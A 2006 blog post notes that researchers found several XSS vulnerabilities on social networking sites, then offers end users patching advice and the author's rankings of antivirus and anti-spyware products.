Wednesday, August 2, 2006

Social networking sites have (gasp!) open XSS vulnerabilities

Researchers at a well known anti-malware company checked out a few popular social networking sites to see how vulnerable they were. In 30 minutes they discovered more than half a dozen server side "worm-able" Cross Site Scripting (XSS) vulnerabilities.

What can end users do?

1) Patch your operating systems! Windows users should be aware that Microsoft generally releases critical updates every second Tuesday of the month. Setting your automatic updates to check once per week (the longest period you can select in the UI) is a great idea. I recommend selecting Wednesday early in the morning - before your work day starts. Leave your machine on Tuesday night . . .

2) Subscribe to good anti-virus protection

3) Subscribe to Malware/Spyware/Adware protection

AntiVirus products that tested well in recent reviews:

- eTrust 8.1 Corporate (Not the home or personal version.)

- Kaspersky

- NOD32

- F-Secure

Some not so good choices:

Symantec AV (over 30% tested infection rate with current signatures)

McAfee AV (over 33% infection rates, plus exploitable holes in their update service.)

While both of the above share the most market share - they offer abysmal protection. They are also system resource pigs. I tell friends that ask me which engine to choose that these two products will turn a perfectly good Pentium IV machine into a PII . . .

Malware Real Time Protection - Best products in order of effectiveness

- Sunbelt Software's CounterSpy (cousin of Windows AntiSpyware Beta 1 and distant relative of Microsoft Defender Beta - but much better!)

- Spysweeper

Malware scanners

Spybot Search & Destroy

Adaware Personal

(Links from this article will open a new browser window.)

No comments:

Post a Comment

Comments are welcome but moderated to prevent spam links. I usually check them at least once a day in the evenings - so please be patient with me if your comment does not appear quickly.

Thank you.